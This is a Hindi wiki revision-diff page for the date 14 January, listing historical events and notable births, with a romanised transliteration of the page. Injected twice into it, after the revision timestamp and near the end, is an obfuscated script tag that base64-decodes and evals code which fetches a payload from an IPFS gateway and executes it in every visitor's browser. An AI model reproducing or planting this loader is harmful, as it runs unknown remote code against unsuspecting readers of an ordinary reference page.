Difference between revisions of "14 जनवरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
  
 
==14 जनवरी की महत्त्वपूर्ण घटनाएँ==
 
==14 जनवरी की महत्त्वपूर्ण घटनाएँ==
 +
* 1514 - पोप लियो एक्स ने दासता के विरुद्ध आदेश पारित किया।
 
* 1758 - [[ईस्ट इंडिया कंपनी]] को [[भारत]] में लड़ाई में जीती हुई संपत्ति अपने पास रखने का अधिकार [[इंग्लैंड]] नरेश ने दिया।
 
* 1758 - [[ईस्ट इंडिया कंपनी]] को [[भारत]] में लड़ाई में जीती हुई संपत्ति अपने पास रखने का अधिकार [[इंग्लैंड]] नरेश ने दिया।
* 1760 - फ्रांसीसी जनरल लेली ने [[पांडिचेरी]] [[अंग्रेज़|अंग्रेज़ों]] के हवाले कर दिया।
+
* 1760 - [[फ्रांसीसी]] जनरल लेली ने [[पांडिचेरी]] [[अंग्रेज़|अंग्रेज़ों]] के हवाले कर दिया।
* 1761 ‌- [[पानीपत युद्ध तृतीय|पानीपत की तीसरी लड़ाई]] मराठों और अहमदशाह अब्दाली के बीच हुई।
+
* 1761 ‌- [[पानीपत युद्ध तृतीय|पानीपत की तीसरी लड़ाई]] मराठों और [[अहमदशाह अब्दाली]] के बीच हुई।
 +
** [[भारत]] में [[मराठा]] शासकों और [[अहमदशाह दुर्रानी]] के बीच [[पानीपत युद्ध तृतीय|पानीपत का तीसरा युद्ध]] हुआ।
 
* 1784 - [[अमरीका]] ने [[ब्रिटेन]] के साथ शांति संधि की पुष्टि की।
 
* 1784 - [[अमरीका]] ने [[ब्रिटेन]] के साथ शांति संधि की पुष्टि की।
 
* 1809 - [[इंग्लैंड]] और स्पेन ने 'नेपोलियन बोनापार्ट' के ख़िलाफ गठबंधन किया।
 
* 1809 - [[इंग्लैंड]] और स्पेन ने 'नेपोलियन बोनापार्ट' के ख़िलाफ गठबंधन किया।
Line 12: Line 14:
 
* [[1867]] - पेरू ने स्पेन के ख़िलाफ जंग का ऐलान किया।
 
* [[1867]] - पेरू ने स्पेन के ख़िलाफ जंग का ऐलान किया।
 
* [[1907]] - जमैका में भूकंप से किंगस्टन शहर तबाह हो गया और एक हज़ार से अधिक लोग मारे गये।
 
* [[1907]] - जमैका में भूकंप से किंगस्टन शहर तबाह हो गया और एक हज़ार से अधिक लोग मारे गये।
 +
** जमायका में आये भूकम्प में क़रीब 1000 लोगों की मौत हो गई।
 
* [[1918]] - [[फ्रांस]] के पूर्व प्रधानमंत्री जोसेफ कैलाक्स को देशद्रोह के आरोप में गिरफ़्तार किया गया।
 
* [[1918]] - [[फ्रांस]] के पूर्व प्रधानमंत्री जोसेफ कैलाक्स को देशद्रोह के आरोप में गिरफ़्तार किया गया।
 
* [[1950]] - [[ईरान]] में मुहम्मद सईद ने सरकार का गठन किया।
 
* [[1950]] - [[ईरान]] में मुहम्मद सईद ने सरकार का गठन किया।
 +
* [[1954]] - जगदगुरु कृपालु महाराज ने 7 दिनों तक 500 [[हिन्दू]] विद्वानों के समक्ष भाषण दिया। उन्हें पाँचवाँ जगदगुरु चुना गया।
 
* [[1962]] - अल्जीरिया के शहरों में आतंकवादी हमलों में 6 लोग मारे गये।
 
* [[1962]] - अल्जीरिया के शहरों में आतंकवादी हमलों में 6 लोग मारे गये।
 
* [[1966]] - इंडोनेशिया ने राष्ट्रसंघ स्थित अपना मिशन बंद कर दिया।
 
* [[1966]] - इंडोनेशिया ने राष्ट्रसंघ स्थित अपना मिशन बंद कर दिया।
Line 22: Line 26:
 
** इज़रायल ने जार्डन के साथ शांतिवार्ता शुरू की।
 
** इज़रायल ने जार्डन के साथ शांतिवार्ता शुरू की।
 
** पौलैंड के एक जहाज के बाल्टिक सागर में डूब जाने से 54 लोग मारे गये।
 
** पौलैंड के एक जहाज के बाल्टिक सागर में डूब जाने से 54 लोग मारे गये।
 +
* [[1998]] - [[पाकिस्तान]] में एक [[अफ़ग़ान]] कार्गो जहाज़ के दुर्घटनाग्रस्त होने से क़रीब 50 लोगों की मौत हो गई।
 
* [[1999]] - [[भारत]] का पहला अत्याधुनिक 'हवाई यातायात परिसर', [[दिल्ली]] राष्ट्र को समर्पित किया गया।
 
* [[1999]] - [[भारत]] का पहला अत्याधुनिक 'हवाई यातायात परिसर', [[दिल्ली]] राष्ट्र को समर्पित किया गया।
 
* [[2002]] - भारत के रक्षामंत्री जार्ज फर्नांडीज़ ने कहा कि आतंकवाद की समाप्ति के बाद ही सेना सीमा से हटेगी।
 
* [[2002]] - भारत के रक्षामंत्री जार्ज फर्नांडीज़ ने कहा कि आतंकवाद की समाप्ति के बाद ही सेना सीमा से हटेगी।
Line 29: Line 34:
  
 
==14 जनवरी को जन्मे व्यक्ति==
 
==14 जनवरी को जन्मे व्यक्ति==
* 1551 - [[अबुल फ़ज़ल]]- [[मुग़ल काल]] में [[अकबर]] के नवरत्नों में से एक।  
+
* 1551 - [[अबुल फ़ज़ल]]- [[मुग़ल काल]] में [[अकबर]] के नवरत्नों में से एक।
 +
* 1804 - मशहूर संगीतकार जॉन पार्क का जन्म हुआ।
 
* [[1977]] - नारायण कार्तिकेयन-  [[भारत]] के एकमात्र फ़ॉरमूला वन चालक।
 
* [[1977]] - नारायण कार्तिकेयन-  [[भारत]] के एकमात्र फ़ॉरमूला वन चालक।
 
+
* [[1967]] - [[अमेरिका|अमेरिकी]] [[अभिनेत्री]] एमिली वॉटसन का जन्म हुआ।
 
==14 जनवरी को हुए निधन==
 
==14 जनवरी को हुए निधन==
  

Revision as of 09:06, 27 January 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 14 janavari varsh ka 14 vaan din hai. sal mean abhi aur 351 din shesh haian. (lip varsh mean 352 din)

14 janavari ki mahattvapoorn ghatanaean

  • 1514 - pop liyo eks ne dasata ke viruddh adesh parit kiya.
  • 1758 - eest iandiya kanpani ko bharat mean l daee mean jiti huee sanpatti apane pas rakhane ka adhikar ianglaiand naresh ne diya.
  • 1760 - phraansisi janaral leli ne paandicheri aangrezoan ke havale kar diya.
  • 1761 ‌- panipat ki tisari l daee marathoan aur ahamadashah abdali ke bich huee.
  • 1784 - amarika ne briten ke sath shaanti sandhi ki pushti ki.
  • 1809 - ianglaiand aur spen ne 'nepoliyan bonapart' ke khilaph gathabandhan kiya.
  • 1858 - nepoliyan tritiy ki hatya ki sajish ka bhandapho d hua.
  • 1867 - peroo ne spen ke khilaph jang ka ailan kiya.
  • 1907 - jamaika mean bhookanp se kiangastan shahar tabah ho gaya aur ek hazar se adhik log mare gaye.
    • jamayaka mean aye bhookamp mean qarib 1000 logoan ki maut ho gee.
  • 1918 - phraans ke poorv pradhanamantri joseph kailaks ko deshadroh ke arop mean giraftar kiya gaya.
  • 1950 - eeran mean muhammad seed ne sarakar ka gathan kiya.
  • 1954 - jagadaguru kripalu maharaj ne 7 dinoan tak 500 hindoo vidvanoan ke samaksh bhashan diya. unhean paanchavaan jagadaguru chuna gaya.
  • 1962 - aljiriya ke shaharoan mean atankavadi hamaloan mean 6 log mare gaye.
  • 1966 - iandoneshiya ne rashtrasangh sthit apana mishan band kar diya.
  • 1986 - gvatemala mean vinisiyoan kerajo 6 varshoan mean pahale asainik rashtrapati bane.
  • 1982 - shrimati iandira gaandhi ne 20sootri karyakram ki ghoshana ki.
  • 1989 - ilahabad mean barah varsh bad kumbh ka mela prarambh hua.
  • 1992 -
    • izarayal ne jardan ke sath shaantivarta shuroo ki.
    • paulaiand ke ek jahaj ke baltik sagar mean doob jane se 54 log mare gaye.
  • 1998 - pakistan mean ek afagan kargo jahaz ke durghatanagrast hone se qarib 50 logoan ki maut ho gee.
  • 1999 - bharat ka pahala atyadhunik 'havaee yatayat parisar', dilli rashtr ko samarpit kiya gaya.
  • 2002 - bharat ke rakshamantri jarj pharnaandiz ne kaha ki atankavad ki samapti ke bad hi sena sima se hategi.
  • 2005 - jammoo - kashmir mean do muthabhe doan mean paanch atankavadi mare gaye.
  • 2008 - uttar pradesh shasan ki nivida moolyaankan kameti ne jepi samooh ko ek hazar kimi lambi 'ganga eksapres ve yojana' ka kam sauanpane ki sanstriti ki.
  • 2009 - sarakar ne videshi patroan ke phesimail (prati) sanskaranoan se shat-pratishat videshi nivesh ko manzoori dene ki ghoshana ki.

14 janavari ko janme vyakti

14 janavari ko hue nidhan

14 janavari ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh